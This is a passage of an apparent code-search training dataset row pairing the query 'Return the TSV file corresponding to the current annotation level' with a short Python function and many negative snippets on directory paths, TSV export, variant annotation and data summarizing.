DIR_PATH", "def _get_recon_directory(self):\n\n return os.path.join(self._default_recon_dir_path, os.path.pardir, \"recon/\")", "def base_dir(self):\n return self.cm.get(YAML_CONFIG_WORKING_REPO)", "def get_path() -> str:\n return os.path.dirname(os.path.realpath(__file__))", "def localdir():\n root = __file__\n if os.path.islink(root):\n root = os.path.realpath(root)\n directory = os.path.dirname(os.path.abspath(root))\n return os.path.normpath(os.path.join(directory, \"../settings/\"))", "def get_working_dir():\n working_dir = os.path.dirname(os.path.abspath(__file__))\n return working_dir", "def path(self):\n path = os.path.join(self.base_dir, self.store().replace(' ', '_'), self.package_name())\n return os.path.abspath(path)", "def log_directory(self):\n\n return self.get_raw(\"log_directory\")", "def get_log_directory(self):\n\n return self.__config_parser__.get('SETTINGS', 'LOGFILE_DIRECTORY')", "def default_module_dir(self):\n return os.path.dirname(self._modules['default'].path)", "def get_directory(self):\n return self.directory", "def get_project_dir():\n\n return Path(settings.PROJECT_DIR)", "def app(self) -> str:\n return pulumi.get(self, \"app\")", "def get_project_dir():\n path = Path(__file__).parent.parent\n project_dir = path.parent\n return 
project_dir", "def directory(self) -> str:\n return self._values.get(\"directory\")", "def module_path(self):\n return self.config['cwd']", "def get_root_folder() -> Path:\n return Path(__file__).parent.parent", "def get_base_dir(self):\n return self._config_dict['output']['@baseDirectory']", "def app_name(self):\n module_filepath = inspect.getfile(type(self))\n parent_dir = os.path.dirname\n app_dirpath = parent_dir(parent_dir(parent_dir(module_filepath)))\n app_name = os.path.basename(app_dirpath)\n return app_name", "def GetPath(self):\n sdk_root = config.Paths().sdk_root\n if not sdk_root:\n raise NoSdkRootError()\n return os.path.join(sdk_root, self.name)", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def dir(self) -> str:\n return f'{os.path.dirname(self.path)}/'.lstrip('/')", "def package_dir(self):\r\n return \".\"", "def get_project_root():\n return Path(__file__).parent.parent", "def get_dir(self):\n return self.dir", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def _get_reporoot():\n from os import path\n import acorn\n medpath = path.abspath(acorn.__file__)\n return path.dirname(path.dirname(medpath))", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP", "def project_directory(self):\n\n # try to figure it out from the maps\n # search for Project path\n\n project_dir = None\n maps = self.comp_prefs['Paths'].get('Map', None)\n if maps:\n project_dir = maps.get('Project:', None)\n\n #if not project_dir:\n # # set the map for the project dir\n # if self.version:\n # project_dir = os.path.dirname(self.version.absolute_path)\n # self.project_directory = project_dir\n\n return project_dir", "def _get_project_dir(self):\n return os.path.expanduser(\n self.sqlfluff_config.get_section(\n (self.templater_selector, self.name, \"project_dir\")\n )\n or os.getcwd()\n )", "def get_working_directory():\n return os.getcwd()", "def python_dir(self):\n return self._python_dir", "def get_app_location(self, name: str) -> Path:\n location = self.config[\"apps\"].get(name)\n if location is None:\n _print_and_quit(f\"Unknown app '{name}'.\")\n return Path(location)", "def dir(self):\n return os.path.dirname(self.path)", "def get_working_dir(self):\r\n return self.process.get_working_dir()", "def findSettingsDirectory(appName=\"pyQode\"):\n home = os.path.expanduser(\"~\")\n if sys.platform == \"win32\":\n pth = os.path.join(home, appName)\n else:\n pth = os.path.join(home, \".%s\" % appName)\n if not os.path.exists(pth):\n os.mkdir(pth)\n return pth", "def getTemplateDir():\n return os.path.join(Configurations.getProjectRootDir(), TEMPLATE_DIR_NAME)", "def getParentDirectory():\n path = os.path.dirname(os.path.realpath(__file__))\n path = '/'.join( path.split('/')[:-1] )\n return path", "def getProjectRootDir():\n return ROOT_DIR" ]
[ "0.8366667", "0.7430168", "0.73666745", "0.7327246", "0.731593", "0.73079205", "0.7295801", "0.7282597", "0.7222026", "0.7218878", "0.72007245", "0.7196958", "0.71940666", "0.7193182", "0.71729344", "0.7168441", "0.7165291", "0.7127867", "0.70903516", "0.70903516", "0.708375", "0.7078099", "0.7051507", "0.7051216", "0.7017435", "0.7017429", "0.7015702", "0.6992589", "0.69919926", "0.6990434", "0.69808424", "0.6970868", "0.69568753", "0.6951718", "0.69347185", "0.69292074", "0.6920551", "0.69042134", "0.68786615", "0.68612844", "0.68612844", "0.6860265", "0.68600786", "0.68523574", "0.68496424", "0.6842661", "0.6841251", "0.68212795", "0.6781112", "0.67494637", "0.6731547", "0.6722558", "0.6720932", "0.67202854", "0.67042977", "0.6695731", "0.668822", "0.66733885", "0.66646963", "0.66566145", "0.6654507", "0.66539925", "0.66524273", "0.66520447", "0.6634699", "0.6625462", "0.662239", "0.6616391", "0.6614785", "0.660628", "0.66026753", "0.6596913", "0.6589512", "0.6583363", "0.6578113", "0.6575538", "0.6571483", "0.6570752", "0.6568595", "0.65591586", "0.6550087", "0.654546", "0.6544662", "0.653404", "0.6532385", "0.6532385", "0.6531273", "0.65243787", "0.6523377", "0.6517297", "0.6515852", "0.6510816", "0.64950424", "0.64836764", "0.647792", "0.64717335", "0.6457084", "0.6452234", "0.64507645", "0.64370465" ]
0.8947229
0
Return the TSV file corresponding to the current annotation level.
def tsv_name(): if PAR['level'] == 1: return 'col.tsv' else: return 'myc.tsv'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tsv_value(self):\n return self.tsv_file.getvalue()", "def export_tsv(self):\n outputfile = tkinter.filedialog.asksaveasfilename(\n defaultextension=\".tsv\",\n filetypes=((\"tab seperated values\", \"*.tsv\"),\n (\"All Files\", \"*.*\")))\n if outputfile:\n tabledata = self.tabs.window.aistracker.create_table_data()\n export.write_csv_file(tabledata, outputfile, dialect='excel-tab')\n else:\n raise ExportAborted('Export cancelled by user.')", "def get_ap_file(self):\n with open(self.trendfile, 'r') as readfile:\n data = json.load(readfile)\n return data['trendtable']", "def _current_vlog_fn(level):\n return getattr(vlog.Vlog, _LOG_MAPPING[level].__name__)", "def create_tsv(df, filename=None):\n table = df.to_string()\n lines = table.splitlines()\n index_name = lines.pop(1).strip()\n lines[0] = index_name + lines[0][len(index_name):]\n table = '\\n'.join(lines)\n if filename is not None:\n with open(filename, 'w') as f:\n f.write(table)\n else:\n return table", "def get_time_trace_file(root_dir, exp_name, plane_num):\n exp_dir = os.path.join(root_dir, exp_name)\n time_trace_dir = os.path.join(exp_dir, 'time_trace')\n plane_string = 'plane{0:02d}'.format(plane_num+1)\n plane_dir = os.path.join(time_trace_dir, plane_string)\n trace_file = os.path.join(plane_dir, 'timetrace_roi.mat')\n return trace_file", "def gencode_gtf(self):\n return op.join(self.root_dir, \"gencode.annotation.gtf\")", "def tsv_header(self):\n return self.tsv_lines[0]", "def _get_ann_file(self):\n prefix = 'instances' if 'test' not in self.image_set else 'image_info'\n return os.path.join(self.data_path, 'annotations',\n prefix + '_' + self.image_set + '.json')", "def write_files_tsv(md, import_path, target_path, import_type='flat'):\n\n target_path = pathlib.Path(target_path)\n import_path = pathlib.Path(import_path)\n\n if import_type == 'flat':\n md = md # If we implement other import types (e.g., plates), filter md\n else:\n raise ValueError('Currently only \\'flat\\' import types implemented')\n\n target_project = \"Project:name:\" + md.project.astype(str) + \"/\"\n target_dataset = \"Dataset:name:\" + md.dataset.astype(str)\n tsv_target = target_project + target_dataset\n filepath = str(target_path) + \"/\" + md.filename\n df = pd.DataFrame({\"target\": tsv_target, \"path\": filepath})\n files_tsv = df.to_csv(sep='\\t', header=False,\n index=False, quoting=csv.QUOTE_NONE)\n files_tsv_path = import_path / 'files.tsv'\n with open(files_tsv_path, 'w') as f:\n f.write(files_tsv)\n return files_tsv_path", "def _cmd_export_jtv(args):\n sample_ids = list(map(core.fbase, args.filenames))\n table = export.merge_samples(args.filenames)\n formatter = export.EXPORT_FORMATS[\"jtv\"]\n outheader, outrows = formatter(sample_ids, table)\n write_tsv(args.output, outrows, colnames=outheader)", "def outputLevelCsv(self):\n # extract level information from result info\n extract_level = []\n extract_level = [item for item in self._result_info if self._result_info[2][0:5]=='LEVEL']\n if extract_level == []:\n print('No Result of LEVEL')\n return None\n # copy need information\n for i, item in enumerate(extract_level):\n self._level_csv_list[i][0] = item[1]\n self._level_csv_list[i][1] = item[2].split('-')[1]\n self._level_csv_list[i][2] = item[2].split('-')[2]\n self._level_csv_list[i][3] = item[4]\n # set csv file name\n csv_file_name = self._filename.rsplit('.', 1)[1] + '.csv'\n # write csv\n with open(csv_file_name, 'w') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerows(self._level_csv_list)", "def write_tsv(self, 
filename):\n f = open(filename,'wb')\n wr = csv.writer(f,delimiter='\\t',quoting=csv.QUOTE_ALL)\n colrow = []\n for col in self.cols:\n colrow.append('<undefined>' if len(col) == 0 else unicode(iter(col).next()).encode('unicode-escape'))\n wr.writerow(colrow)\n for row in self.data:\n strrow = []\n for cell in row:\n strrow.append('' if cell is None else unicode(cell).encode('unicode-escape'))\n wr.writerow(strrow)\n f.close()", "def to_tsv(obj: ConfiguredBaseModel, file: str) -> str:\n\n # Extract headers and rows from object\n if isinstance(obj, Entity):\n headers = obj.dict().keys()\n rows = [list(obj.dict().values())]\n elif isinstance(obj, (AssociationCountList, HistoPheno, Results)):\n if not obj.items:\n headers = get_headers_from_obj(obj)\n rows = []\n else:\n headers = obj.items[0].dict().keys()\n rows = [list(item.dict().values()) for item in obj.items]\n else:\n raise TypeError(FMT_INPUT_ERROR_MSG)\n\n fh = open(file, \"w\") if file else sys.stdout\n writer = csv.writer(fh, delimiter=\"\\t\")\n writer.writerow(headers)\n for row in rows:\n writer.writerow(list(row))\n if file:\n fh.close()\n console.print(f\"\\nOutput written to {file}\\n\")\n\n return", "def annotate_tsv_freq(in_tsv_gz,annotation_tsv):\n sys.stderr.write(\"Reading TSV file ...\\n\")\n nicollo = pd.read_csv(BOLLI, sep=\"\\t\")\n nicollo = nicollo.iloc[:,[1,2,4,5,23]]\n nicollo_counts = nicollo.groupby(['CHR','START'])['MT'].count()\n nol_var = nicollo.drop(['WT','MT'], axis = 1) \n nol_var = nol_var.set_index(['CHR', 'START'])\n\n #nicollo_counts = nicollo.groupby([\"CHR\",\"START\",\"WT\",\"MT\"]).size().reset_index(name=\"count\")\n #nicollo_counts = nicollo_counts[[\"CHR\", \"START\",\"count\"]].set_index(['CHR','START'])\n\n mmrf = pd.read_csv('/ifs/res/leukgen/home/yellapav/MMRF/MMRF_CoMMpass_IA9_All_Canonical_Variants.txt', sep=\"\\t\")\n mmrf=mmrf.iloc[:,[0,1,2,4,5,19,23]]\n mmrf=mmrf.drop_duplicates()\n\n mmrfM=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].median()\n mmrfC=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].count()\n mmrfQ25=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].quantile(q=0.25)\n mmrfQ75=mmrf.groupby(['CHROM','POS'])['GEN[1].AR'].quantile(q=0.75)\n \n\n #anno_tsv = pd.read_csv(annotation_tsv, comment='#',sep=\"\\t\")\n anno_tsv = pd.read_csv(annotation_tsv, comment='#',sep=\"\\t\", low_memory=False)\n #anno_tsv[anno_tsv['FILTER'] == \"PASS\"]\n counts_tsv=anno_tsv.groupby([\"CHR\",\"START\",\"REF\",\"ALT\"]).size().reset_index(name=\"count\")\n counts_tsv=counts_tsv[[\"CHR\", \"START\",\"count\"]].set_index(['CHR','START'])\n counts_median=anno_tsv.groupby(['CHR','START'])['TARGET_VAF'].median()\n\n\n\n inFile = gzip.open(in_tsv_gz,'r')\n \n sys.stderr.write(\"Annotating ...\\n\")\n for record in inFile:\n record=record.decode(\"utf-8\")\n record=record.rstrip()\n recArr=record.split(\"\\t\")\n \n cl = [] \n freq = [] \n medVAF = [] \n Q25 = [] \n Q75 = [] \n positions = [] \n normal = \"0\" \n normalVAF = \"0\" \n bolli_cl = [] \n bolli_freq = [] \n bolli_positions = [] \n bolli_anno = [] \n flag = 0\n bolli_flag = 0\n if record.startswith(\"#\"):\n continue\n\n if recArr[0] == \"ID_VARIANT\":\n cl = \"MMRF_Class\"\n freq = \"MMRF_Frequency\"\n medVAF = \"MMRF_VAF\"\n Q25 = \"MMRF_Q25\"\n Q75 = \"MMRF_Q75\"\n positions = \"MMRF_Positions\"\n normal = \"Normals_Frequency\"\n normalVAF = \"Normals_median_VAF\"\n bolli_cl = \"Bolli_Class\"\n bolli_freq = \"Bolli_Frequency\"\n bolli_positions = \"Bolli_Positions\"\n bolli_anno = \"Bolli_Annotation\"\n record = [ record, cl, freq, medVAF, Q25, 
Q75, positions, bolli_cl, bolli_freq, bolli_anno, bolli_positions, normal, normalVAF ]\n record = (\"\\t\".join(record))\n print(record)\n continue\n\n try:\n chrom = str(recArr[3])\n pos = int(recArr[4])\n start = int(recArr[4]) - 9\n end = int(recArr[4]) + 9\n if (chrom, pos) in mmrfC.index:\n cl = \"genomic_exact\"\n freq = str(mmrfC.loc[(chrom,pos)])\n medVAF = str(mmrfM.loc[(chrom,pos)])\n Q25 = str(mmrfQ25.loc[(chrom,pos)])\n Q75 = str(mmrfQ75.loc[(chrom,pos)])\n positions = str(pos)\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n flag = 1\n if flag == 0:\n mmrfCsub=mmrfC.loc[chrom]\n if not mmrfCsub[(mmrfCsub.index >= start) & (mmrfCsub.index <= end)].empty:\n for i in mmrfCsub[(mmrfCsub.index >= start) & (mmrfCsub.index <= end)].index.values:\n cl = \"genomic_close\"\n freq.append(str(mmrfC.loc[(chrom,i)]))\n medVAF.append(str(mmrfM.loc[(chrom,i)]))\n Q25.append(str(mmrfQ25.loc[(chrom,i)]))\n Q75.append(str(mmrfQ75.loc[(chrom,i)]))\n positions.append(str(i))\n freq = (\":\".join(freq))\n medVAF = (\":\".join(medVAF))\n Q25 = (\":\".join(Q25))\n Q75 = (\":\".join(Q75))\n positions = (\":\".join(positions))\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n else:\n cl = \"NA\"\n freq = \"NA\"\n medVAF = \"NA\"\n Q25 = \"NA\"\n Q75 = \"NA\"\n positions = \"NA\"\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n\n\n except:\n cl = \"NA\"\n freq = \"NA\"\n medVAF = \"NA\"\n Q25 = \"NA\"\n Q75 = \"NA\"\n positions = \"NA\"\n record = [ record, cl, freq, medVAF, Q25, Q75, positions ]\n record = (\"\\t\".join(record))\n\n\n\n try:\n chrom = str(recArr[3])\n pos = int(recArr[4])\n start = int(recArr[4]) - 9\n end = int(recArr[4]) + 9\n if (chrom, pos) in nicollo_counts.index:\n bolli_cl = \"genomic_exact\"\n bolli_freq = str(nicollo_counts.loc[(chrom,pos)]) \n bolli_positions = str(pos)\n bolli_anno = str(nol_var.loc[chrom, pos]['Variant_class'].values[0])\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n bolli_flag = 1\n\n\n if bolli_flag == 0: \n nicollo_counts_sub=nicollo_counts.loc[chrom]\n if not nicollo_counts_sub[(nicollo_counts_sub.index >= start) & (nicollo_counts_sub.index <= end)].empty:\n for i in nicollo_counts_sub[(nicollo_counts_sub.index >= start) & (nicollo_counts_sub.index <= end)].index.values:\n #if not nicollo_counts_sub.ix[start:end].empty:\n # for i in nicollo_counts_sub.ix[start:end].index.values:\n #print(\"XXXXXXX\",i, nicollo_counts_sub.loc[(chrom,i)], start, end)\n bolli_cl = \"genomic_close\"\n bolli_freq.append(str(nicollo_counts.loc[(chrom,i)]))\n bolli_anno.append(str(nol_var.loc[(chrom,i)]['Variant_class'].values[0]))\n bolli_positions.append(str(i))\n bolli_freq = (\":\".join(bolli_freq))\n bolli_positions = (\":\".join(bolli_positions))\n bolli_anno = (\":\".join(bolli_anno))\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n else:\n bolli_cl = \"NA\"\n bolli_freq = \"NA\"\n bolli_positions = \"NA\"\n bolli_anno = \"NA\"\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n\n\n except:\n bolli_cl = \"NA\"\n bolli_freq = \"NA\"\n bolli_anno = \"NA\"\n bolli_positions = \"NA\"\n record = [ record, bolli_cl, bolli_freq, bolli_anno, bolli_positions ]\n record = (\"\\t\".join(record))\n\n\n normal = \"0\"\n normalVAF = \"0\"\n try:\n 
chrom=str(recArr[3])\n pos=int(recArr[4])\n normal = counts_tsv.loc[(chrom,pos),\"count\"]\n normal = normal.ix[0]\n normal = str(normal)\n\n normalVAF = str(counts_median.loc[(chrom,pos)])\n\n record = [ record, normal, normalVAF ]\n record = (\"\\t\".join(record))\n print(record)\n\n except:\n normal = \"0\"\n normalVAF = \"0\"\n record = [ record, str(normal), str(normalVAF) ]\n record = (\"\\t\".join(record))\n print(record)", "def get_filepath(self, **kwargs) -> str:\n return f'dag_{self.dag_id}.py'", "def exportVTK(self, fname):\r\n filename, ext = os.path.splitext(fname)\r\n if self.GridType == \"vtkStructuredGrid\":\r\n sWrite = vtk.vtkXMLStructuredGridWriter()\r\n sWrite.SetInputData(self.Grid)\r\n sWrite.SetFileName(filename + \".vts\")\r\n sWrite.Write()\r\n elif self.GridType == \"vtkUnstructuredGrid\":\r\n sWrite = vtk.vtkXMLUnstructuredGridWriter()\r\n sWrite.SetInputData(self.Grid)\r\n sWrite.SetFileName(filename + \".vtu\")\r\n sWrite.Write()\r\n else:\r\n print(\"Grid type is not recognized\")", "def collapsed_to_sirv_abundance(self):\n return op.join(self.collapse_to_sirv_dir, \"touse.abundance.txt\")", "def _original_vlog_fn(level):\n return _LOG_MAPPING[level]", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def write_tsv(df, path):\n df.to_csv(path, sep=\"\\t\", compression=\"gzip\")", "def get_level(self, level):\n return", "def get_tag(level: int) -> str:\n return LEVEL_TAGS[level]", "def to_tsv(self, out_dir, sep=\"\\t\", prefix=None, **kwargs):\n os.makedirs(out_dir, exist_ok=True) # create dirs if non-existent\n prefix = f\"{prefix}_\" if prefix else \"\"\n fpaths = [\n os.path.join(out_dir, f\"{prefix}{suf}.tsv\")\n for suf in [\"data\", \"sample_meta\"]\n ]\n self.data.to_csv(fpaths[0], sep=\"\\t\", **kwargs)\n self.sample_meta.to_csv(fpaths[1], sep=\"\\t\", **kwargs)", "def print_tsv(data, filename):\n with open(filename, 'wt') as fout:\n writefile = partial(print, sep='\\t', file=fout)\n writefile('Sample', *expected_header)\n for sample in data:\n for entry in data[sample]:\n writefile(sample, *(entry[field] for field in expected_header))", "def convert_tracefilename(self, filepath):\n filename, extension = os.path.splitext(os.path.basename(filepath))\n return filename + '.csv'", "def kmer_vector2tsv_file(filename, kmer_vector, min_length, max_length,\n enable_gzip=False):\n try:\n fh = gzip.open if enable_gzip else open\n with fh(filename, 'wt') as out:\n for index, count in enumerate(kmer_vector):\n seq = number2multisize_patten(index, min_length, max_length)\n out.write('{seq}\\t{count}\\n'.format(seq=seq,\n count=count))\n return filename\n except Exception:\n print('Not able to create [%s]\\n' % filename)\n raise", "def _tf(file_path):\n return os.path.join(test_pipeline_dir, file_path)", "def save_tsv_file(parsed_data):\n result_file.write('\\t'.join(parsed_data) + '\\n')", "def getSceneFile(self):\n logger.debug(\"Func: getSceneFile\")\n return -1", "def write_tsv_fast(self, filename):\n # TODO (without quotation marks)\n with open(filename, 'wb') as f:\n colnames = ['<undefined>' if len(col) == 0 else unicode(iter(col).next()).encode('unicode-escape') for col in self.cols]\n f.write('\\t'.join(colnames)+'\\n')\n for row in self.data:\n f.write('\\t'.join(['' if cell is None else unicode(cell).encode('unicode-escape') for cell in row])+'\\n')", "def info(self):\n tline = \"\"\n for (ii, projection) in enumerate(self._ProjectionList):\n tiltAngle = projection._tiltAngle\n transX = -projection._alignmentTransX\n transY = 
-projection._alignmentTransY\n rot = -(projection._alignmentRotation + 90.)\n mag = projection._alignmentMagnification\n tline = tline + (\"%3d: \" % ii)\n tline = tline + (\"%15s; \" % projection._filename)\n tline = tline + (\"tiltAngle=%9.3f; \" % tiltAngle)\n tline = tline + (\"transX=%9.3f; \" % transX)\n tline = tline + (\"transY=%9.3f; \" % transY)\n tline = tline + (\"rot=%9.3f; \" % rot)\n tline = tline + (\"mag=%9.3f\\n\" % mag)\n print(tline)", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def get_log_file(self):\n self.log_file = os.path.join(\n self.directory,\n \"ts\",\n self.ts.reaction_label,\n \"conformers\",\n \"{}_{}_{}.log\".format(self.ts.reaction_label, self.ts.direction, self.ts.index))\n return self.log_file", "def _get_kps_ann_file(self):\n prefix = 'person_keypoints' if 'test' not in self.image_set else 'image_info'\n return os.path.join(self.data_path, 'annotations',\n prefix + '_' + self.image_set + '.json')", "def _get_filepath(self) -> str:\n return os.path.join(\n os.sep.join(\n [\n self.period.value,\n 'activities',\n f'activities_{self._dt_string}.json'\n ]\n )\n )", "def parse_table_to_tracy_file(latname: str, df: pd.DataFrame, filename: str) -> None:\n save_string(parse_table_to_tracy_string(latname, df), filename)", "def _tokens_path(self, row):\n return os.path.join(self.path, 'texts', row.tokens_path())", "def reportinfo(self):\n return self.fspath, 0, f\"usecase: {self.name}\"", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def save_vtu_file(arr, name, filename, sample_fp=None):\n if sample_fp == None:\n sample_fp = vda.get_sorted_fps_U(self.settings.DATA_FP)[0]\n\n ug = vtktools.vtu(sample_fp) #use sample fp to initialize positions on grid\n\n ug.AddScalarField('name', arr)\n ug.Write(filename)", "def summarize_tsvs(\n self,\n tsv_dir,\n dd,\n prefix=\"\",\n outlier_threshold=10,\n omit_props=[\n \"project_id\",\n \"type\",\n \"id\",\n \"submitter_id\",\n \"case_submitter_id\",\n \"case_ids\",\n \"visit_id\",\n \"sample_id\",\n \"md5sum\",\n \"file_name\",\n \"object_id\",\n \"series_uid\",\n \"study_uid\",\n \"token_record_id\"\n ],\n omit_nodes=[\"metaschema\", \"root\", \"program\", \"project\", \"data_release\"],\n outdir=\".\",\n bin_limit=False,\n write_report=True,\n report_null=True,\n ):\n\n summary = {}\n\n report = pd.DataFrame(\n columns=[\n \"prop_id\",\n \"project_id\",\n \"node\",\n \"property\",\n \"type\",\n \"N\",\n \"nn\",\n \"null\",\n \"perc_null\",\n \"all_null\",\n \"min\",\n \"max\",\n \"median\",\n \"mean\",\n \"stdev\",\n \"outliers\",\n \"bin_number\",\n \"bins\",\n ]\n )\n report[\"all_null\"] = report[\"all_null\"].astype(bool)\n\n dir_pattern = \"{}*{}\".format(prefix, \"tsvs\")\n project_dirs = glob.glob(\"{}/{}\".format(tsv_dir, dir_pattern))\n\n nn_nodes, nn_props, null_nodes, null_props, all_prop_ids = [], [], [], [], []\n\n msg = \"Summarizing TSVs in '{}':\\n\".format(tsv_dir)\n print(\"\\n\\n{}\".format(msg))\n\n for project_dir in project_dirs: # project_dir=project_dirs[0]\n\n try:\n project_id = re.search(\n r\"^{}/?([A-Za-z0-9_-]+)_tsvs$\".format(tsv_dir), project_dir\n ).group(1)\n except:\n print(\n \"Couldn't extract the project_id from project_dir 
'{}'!\".format(\n project_dir\n )\n )\n\n fpattern = \"{}*{}\".format(prefix, \".tsv\")\n fnames = glob.glob(\"{}/{}\".format(project_dir, fpattern))\n\n # msg = \"\\t\\tFound the following {} TSVs: {}\".format(len(fnames),fnames)\n # sys.stdout.write(\"\\r\" + str(msg))\n\n # print(fnames) # trouble-shooting\n if len(fnames) == 0:\n continue\n\n for (\n fname\n ) in (\n fnames\n ): # Each node with data in the project is in one TSV file so len(fnames) is the number of nodes in the project with data.\n\n # print(\"\\n\\t\\t{}\".format(fname)) # trouble-shooting\n\n node_regex = (\n re.escape(project_id) + r\"_([a-zA-Z0-9_]+)\\.tsv$\"\n ) # node = re.search(r'^([a-zA-Z0-9_]+)-([a-zA-Z0-9]+)_([a-zA-Z0-9_]+)\\.tsv$',fname).group(3)\n\n try:\n node = re.search(node_regex, fname, re.IGNORECASE).group(1)\n\n except Exception as e:\n print(\n \"\\n\\nCouldn't set node with node_regex on '{}':\\n\\t{}\".format(\n fname, e\n )\n )\n node = fname\n\n df = pd.read_csv(fname, sep=\"\\t\", header=0, dtype=str)\n\n if df.empty:\n print(\"\\t\\t'{}' TSV is empty. No data to summarize.\\n\".format(node))\n\n else:\n nn_nodes.append(node)\n prop_regex = re.compile(\n r\"^[A-Za-z0-9_]*[^.]$\"\n ) # drop the links, e.g., cases.submitter_id or diagnoses.id (matches all properties with no \".\")\n props = list(\n filter(prop_regex.match, list(df))\n ) # properties in this TSV to summarize\n props = [\n prop for prop in props if prop not in omit_props\n ] # omit_props=['project_id','type','id','submitter_id','case_submitter_id','case_ids','visit_id','sample_id','md5sum','file_name','object_id']\n\n # msg = \"\\t\\tTotal of {} records in '{}' TSV with {} properties.\".format(len(df),node,len(props))\n # sys.stdout.write(\"\\r\"+str(msg))\n\n for prop in props: # prop=props[0]\n\n prop_name = \"{}.{}\".format(node, prop)\n prop_id = \"{}.{}\".format(project_id, prop_name)\n print(prop_name)\n\n # because of sheepdog bug, need to inclue \"None\" in \"null\" (:facepalm:) https://ctds-planx.atlassian.net/browse/PXP-5663\n #df.at[df[prop] == \"None\", prop] = np.nan\n\n null = df.loc[df[prop].isnull()]\n nn = df.loc[df[prop].notnull()]\n perc_null = len(null)/len(df)\n ptype = self.get_prop_type(node, prop, dd)\n\n # dict for the prop's row in report dataframe\n prop_stats = {\n \"prop_id\": prop_id,\n \"project_id\": project_id,\n \"node\": node,\n \"property\": prop,\n \"type\": ptype,\n \"N\": len(df),\n \"nn\": len(nn),\n \"null\": len(null),\n \"perc_null\": perc_null,\n \"all_null\": np.nan,\n \"min\": np.nan,\n \"max\": np.nan,\n \"median\": np.nan,\n \"mean\": np.nan,\n \"stdev\": np.nan,\n \"outliers\": np.nan,\n \"bin_number\": np.nan,\n \"bins\": np.nan,\n }\n\n if nn.empty:\n null_props.append(prop_name)\n prop_stats[\"all_null\"] = True\n\n else:\n nn_props.append(prop_name)\n all_prop_ids.append(prop_id)\n prop_stats[\"all_null\"] = False\n\n msg = \"\\t'{}'\".format(prop_id)\n sys.stdout.write(\"\\r\" + str(msg).ljust(200, \" \"))\n\n if ptype in [\"string\", \"enum\", \"array\", \"boolean\", \"date\"]:\n\n if ptype == \"array\":\n\n all_bins = list(nn[prop])\n bin_list = [\n bin_txt.split(\",\") for bin_txt in list(nn[prop])\n ]\n counts = Counter(\n [\n item\n for sublist in bin_list\n for item in sublist\n ]\n )\n\n elif ptype in [\"string\", \"enum\", \"boolean\", \"date\"]:\n\n counts = Counter(nn[prop])\n\n df1 = pd.DataFrame.from_dict(\n counts, orient=\"index\"\n ).reset_index()\n bins = [tuple(x) for x in df1.values]\n bins = sorted(\n sorted(bins, key=lambda x: (x[0])),\n key=lambda x: 
(x[1]),\n reverse=True,\n ) # sort first by name, then by value. This way, names with same value are in same order.\n\n prop_stats[\"bins\"] = bins\n prop_stats[\"bin_number\"] = len(bins)\n\n # Get stats for numbers\n elif ptype in [\"number\", \"integer\"]: # prop='concentration'\n\n # make a list of the data values as floats (converted from strings)\n nn_all = nn[prop]\n d_all = list(nn_all)\n\n nn_num = (\n nn[prop]\n .apply(pd.to_numeric, errors=\"coerce\")\n .dropna()\n )\n d = list(nn_num)\n\n nn_string = nn.loc[~nn[prop].isin(list(map(str, d)))]\n non_numbers = list(nn_string[prop])\n\n if (\n len(d) > 0\n ): # if there are numbers in the data, calculate numeric stats\n\n # calculate summary stats using the float list d\n mean = statistics.mean(d)\n median = statistics.median(d)\n minimum = min(d)\n maximum = max(d)\n\n if (\n len(d) == 1\n ): # if only one value, no stdev and no outliers\n std = \"NA\"\n outliers = []\n else:\n std = statistics.stdev(d)\n # Get outliers by mean +/- outlier_threshold * stdev\n cutoff = (\n std * outlier_threshold\n ) # three times the standard deviation is default\n lower, upper = (\n mean - cutoff,\n mean + cutoff,\n ) # cut-offs for outliers is 3 times the stdev below and above the mean\n outliers = sorted(\n list(\n set(\n [\n x\n for x in d\n if x < lower or x > upper\n ]\n )\n )\n )\n\n # if property type is 'integer', change min, max, median to int type\n if ptype == \"integer\":\n median = int(median) # median\n minimum = int(minimum) # min\n maximum = int(maximum) # max\n outliers = [\n int(i) for i in outliers\n ] # convert outliers from float to int\n\n prop_stats[\"stdev\"] = std\n prop_stats[\"mean\"] = mean\n prop_stats[\"median\"] = median\n prop_stats[\"min\"] = minimum\n prop_stats[\"max\"] = maximum\n prop_stats[\"outliers\"] = outliers\n\n # check if numeric property is mixed with strings, and if so, summarize the string data\n if len(d_all) > len(d):\n\n msg = \"\\t\\tFound {} string values among the {} records of prop '{}' with value(s): {}. Calculating stats only for the {} numeric values.\".format(\n len(non_numbers),\n len(nn),\n prop,\n list(set(non_numbers)),\n len(d),\n )\n print(\"\\n\\t{}\\n\".format(msg))\n\n prop_stats[\"type\"] = \"mixed {},string\".format(ptype)\n\n counts = Counter(nn_string[prop])\n df1 = pd.DataFrame.from_dict(\n counts, orient=\"index\"\n ).reset_index()\n bins = [tuple(x) for x in df1.values]\n bins = sorted(\n sorted(bins, key=lambda x: (x[0])),\n key=lambda x: (x[1]),\n reverse=True,\n )\n 